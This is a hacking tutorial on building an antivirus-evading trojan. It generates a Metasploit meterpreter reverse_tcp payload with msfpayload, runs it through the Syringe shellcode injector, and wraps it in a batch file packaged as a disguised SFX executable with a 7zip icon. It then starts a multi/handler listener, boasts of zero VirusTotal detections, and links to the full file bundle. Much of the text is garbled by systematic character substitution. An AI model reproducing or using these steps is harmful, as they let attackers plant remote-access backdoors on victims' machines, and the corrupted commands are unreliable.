Bypassing antivirus with a sharp syringe

by Hasan aka inf0g33k

independent security researcher

Email: h.inf0g33k@gmail.com B: facebook.com!hasan.infogeek twitter: twitter.com!inf0g33k

"oday i am e#plaining a clever and relatively little known way to bypass antivirus without using any encoder. $ am using syringe for directly running my shell%code. "he method that this tool uses is opens a location in its address space with a call to &irtual'lloc with permissions of read( write( and e#ecute. &irual'lloc is a )indows specific call that reserves a region of memory with the specified permissions. "he read and write permissions are re*uired because the alpha numeric shell code will change itself as it is being e#ecuted. +yringe then copies the user supplied shellcode string into the resulting memory buffer from &irtual'lloc. inally( +yringe e#ecutes the shellcode via an 'ssembly stub that takes a pointer to the shell code as its only parameter before calling it. ,ne of the very nice features of this tool is that the stub used to e#ecute the shell code is wrapped in a +tructured E#ception Handler -+EH. block( allowing the program to e#ecute gracefully( even if the shellcode encounters an error.

/e*. % backdoor.bat -included in package( link below. i.vbs syringe.e#e 0akeE#e romBat.bat 12a.e#e 12sd.sf# metasploit -in backtrack( link below. opt. /esource hacker

3. irst we need to go and generate a payload we can copy and use in our backdoor. using this command

msfpayload windows!meterpreter!reverse4tcp E5$" 6789thread :;,/"9<<<< :H,+"93=>.3?@.33?.3 / A msfencode %a #@? %e #@?!alpha4mi#ed %t raw Buffer/egister9E'5

>. now copy the generated payload and paste it in the backdoor.bat and take care to replace the payload and not removing BC s.batB after it.

3. now open command prompt and run 0akeE#e romBat.bat with following arguments

0akeE#e romBat.bat backdoor.bat i.vbs syringe.e#e

it will create an e#e file with a 12 icon as i am using it to create a + 5 archive.

<. 7ow run multi handler using this command msfcli multi!handler ;'D:,'E9windows!meterpreter!reverse4tcp E5$" 6hread :;,/"9<<<< :H,+"93=>.3?@.33?.3 E

wait a little itFll start listening

G. 7ow lets run our e#e file.

'nd )e got a shellH

7ow lets scan our backdoor with virustotal

's you can see we got 0 detectionH

if you wanna change icon and discription Iust use resource hacker-link below..

J: )hy i am not using batch to e#e converterK ': Everything you compile with it gets detected by some antivirus programs.

J: )hy i am using 12ipK

': "o create + 5 file from our .bat file.

J: )hy i am using this vbs fileK ': Lust to hide the 80E window started by bat file. $ know there are better ways. :inks: 'll files: http:!!www.mediafire.com!Kkamwdi<ci=?c>*1 /esource hacker: Http:!!www.angusI.com!resourcehacker!reshack4setup.e#e 0etaspoit: www.metasploit.com

"hanks for your time.

$nf0g33k